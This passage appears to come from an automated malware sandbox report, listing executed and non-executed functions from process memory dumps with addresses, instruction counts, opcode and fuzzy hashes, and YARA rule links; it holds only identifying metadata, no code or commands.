                                                  • Instruction ID: cd307df86a3bfa14f627d780ec2758ebd7f3625789f7cf936ebe1edcd8ddb606
                                                  • Opcode Fuzzy Hash: 6c73ff166aad4f7f11863a43954d31de2599abe027f624825cde43b560ebb996
                                                  • Instruction Fuzzy Hash: 1A113CB1D00219AFDB04CFA9E854AEEBFF6AF49310F148426EC15B7250D7719A50DFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02A1D01D, Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.534016689.0000000002A1D000.00000040.00000001.sdmp, Offset: 02A1D000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f6b02d87324ecfdc9ddde5727d7ddc8669f993cb0bef33b22f00f5deadedf419
                                                  • Instruction ID: 96377e12496bb75ade93642226b0b99389a7bccf7a2d107393595da7fc9e6e5e
                                                  • Opcode Fuzzy Hash: f6b02d87324ecfdc9ddde5727d7ddc8669f993cb0bef33b22f00f5deadedf419
                                                  • Instruction Fuzzy Hash: A901F271408B40AAE7108B65CCC4BA7BBD8EF41638F08841AED4A1F282C7B99945CAB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 077602E0, Relevance: .0, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d8faab067d2709dbe840c9e9de42f6e6dd265187c5b06de203fe436191d9c7f8
                                                  • Instruction ID: 720f742c53430a44465568af068717d08c192897b0656da769edaa52fd766955
                                                  • Opcode Fuzzy Hash: d8faab067d2709dbe840c9e9de42f6e6dd265187c5b06de203fe436191d9c7f8
                                                  • Instruction Fuzzy Hash: D0015B75A50215CFCB18DF65C958AADB7B5BF88341F110868D902AB2A0CF75DC01DF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02A1D006, Relevance: .0, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.534016689.0000000002A1D000.00000040.00000001.sdmp, Offset: 02A1D000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 58c4f01b293e888465be8b6a27f18e341acc7a2b0710c4efdeb198107f4d03c4
                                                  • Instruction ID: c7ff46b31b75718c4fac3488ce450dc45457a29fa1227967848d63d8ce6e7510
                                                  • Opcode Fuzzy Hash: 58c4f01b293e888465be8b6a27f18e341acc7a2b0710c4efdeb198107f4d03c4
                                                  • Instruction Fuzzy Hash: 3D01527140D7C09FD7128B258C94B52BFA4EF43224F0D80DBE9859F293C3699848C7B2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0776F700, Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b10501c333d8d4fdbcfde64c768ee4782b3386a0c2d4ef25832dac12c29c0a2a
                                                  • Instruction ID: 49f0d4e981d53e9a7fde64bbef74620e99dccd91b16c5bc0ec133a1439246980
                                                  • Opcode Fuzzy Hash: b10501c333d8d4fdbcfde64c768ee4782b3386a0c2d4ef25832dac12c29c0a2a
                                                  • Instruction Fuzzy Hash: 48E0D8F6B052885B8B46A27698158953BDA4E8184131004E2FD46C7269DD548D41D3DA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0776B4C8, Relevance: .0, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a21cc3e1168720e841fa18765dbf19f16504883637f9ebd48da0e00f10fec499
                                                  • Instruction ID: 021e5b88882b5629ea62050c76d5d4f5e9d81d92daffcb407e5ef40cb087f12b
                                                  • Opcode Fuzzy Hash: a21cc3e1168720e841fa18765dbf19f16504883637f9ebd48da0e00f10fec499
                                                  • Instruction Fuzzy Hash: 57D022F451430ECADA20D7E0744C3BABBAFDAC20147684E63FC0DC1018EB3B90524606
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0776EFB3, Relevance: .0, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5f7d731cb3c28227d98d79fa8c53b6a9b5c7b24bcb74043f62fbee196eac19c0
                                                  • Instruction ID: bbfd8b103a95835b3be8bd4c225b268f280c0bb7e2a183918df3bf408be9e850
                                                  • Opcode Fuzzy Hash: 5f7d731cb3c28227d98d79fa8c53b6a9b5c7b24bcb74043f62fbee196eac19c0
                                                  • Instruction Fuzzy Hash: 15D0A7BD10D3810FD7416730AD5D5A63B6A564698035548A2E5088B195D8745C01CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 07762C30, Relevance: 8.1, Strings: 3, Instructions: 4336COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @ [l$@ [l$@ [l
                                                  • API String ID: 0-2176758108
                                                  • Opcode ID: eeb3e07e746f9dcb0da3901f56ad2dd9ed645a7027ee623eaf08ba7de92512ea
                                                  • Instruction ID: 46939f297b1d7a14e9b26abcd86808fe1291bae637cbbd2103823ea66b64b7d6
                                                  • Opcode Fuzzy Hash: eeb3e07e746f9dcb0da3901f56ad2dd9ed645a7027ee623eaf08ba7de92512ea
                                                  • Instruction Fuzzy Hash: B4A30974E012189FDB64DFA0C994BEE77B6EB84304F1049E9910E6B294DF356E81EF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 07762C40, Relevance: 8.1, Strings: 3, Instructions: 4326COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @ [l$@ [l$@ [l
                                                  • API String ID: 0-2176758108
                                                  • Opcode ID: b4dfb2cd9b9c1f8d784df6d18e4ebf15eda9893735aeee476fd5ddd5141774dc
                                                  • Instruction ID: b0d31f4188ec01be11b7f7f2ce1a7a5ff114f20f91a3dd21dd821ee091eb6ad9
                                                  • Opcode Fuzzy Hash: b4dfb2cd9b9c1f8d784df6d18e4ebf15eda9893735aeee476fd5ddd5141774dc
                                                  • Instruction Fuzzy Hash: ACA30974E012189FDB64DFA0C994BEE77B6EB84304F1049E9910E6B294DF356E81EF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0776A797, Relevance: .5, Instructions: 451COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c0030c4ccd0abdc4ef25ccc698a09ddbabc85784e2a3cd12a194ccb90c2f2594
                                                  • Instruction ID: 5bd7164d36a6c375d7c838810577bcc0657f76d4d72673edcaaa7b72295e7afb
                                                  • Opcode Fuzzy Hash: c0030c4ccd0abdc4ef25ccc698a09ddbabc85784e2a3cd12a194ccb90c2f2594
                                                  • Instruction Fuzzy Hash: C1F14F74B002059FCB04CF64D9989AEBBF6BF89354B16C469E905EB369DB30EC41CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0776DA60, Relevance: .4, Instructions: 362COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cf9160582afcd3227a5657d6f198299992041a0be0f97f8cb09139f83bac9b97
                                                  • Instruction ID: b711e091cbc47176d4c434f066ed7930b70f8d708d5c3f2bc1440e7aadae5471
                                                  • Opcode Fuzzy Hash: cf9160582afcd3227a5657d6f198299992041a0be0f97f8cb09139f83bac9b97
                                                  • Instruction Fuzzy Hash: 6CC100747102089BDB24AAA488197EF72ABEFC4745F048429E9069B3C8DF79CC469B91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0776B500, Relevance: .3, Instructions: 348COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 07313e2ae55b3db015cfaedbbd6aad040f37c5f69cc38cdb1a52510de927e710
                                                  • Instruction ID: 776b60df6de172a2a4b14d47fbaa5a82f82664dfea210b8c57f022b8fc965c66
                                                  • Opcode Fuzzy Hash: 07313e2ae55b3db015cfaedbbd6aad040f37c5f69cc38cdb1a52510de927e710
                                                  • Instruction Fuzzy Hash: 9FD149B4B102158FCB08DFA8D998AAE77F6BF89754B1544A9E906DB364DF31EC01CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 07769080, Relevance: .3, Instructions: 335COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.547597225.0000000007760000.00000040.00000010.sdmp, Offset: 07760000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5d45571123ddbf1a21bbe1b9d12299de3a7bc0c98e586d2341ed79214bca2d0c
                                                  • Instruction ID: 381c8191bb8c026a296fd120a9a38b0f95c1c5a691d2c82f472ad4cb2e447fec
                                                  • Opcode Fuzzy Hash: 5d45571123ddbf1a21bbe1b9d12299de3a7bc0c98e586d2341ed79214bca2d0c
                                                  • Instruction Fuzzy Hash: 19C1F675B04A468FD320CA69CC847AFB7E3AFD5304F18C96DD5568BB8AD634F8448B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%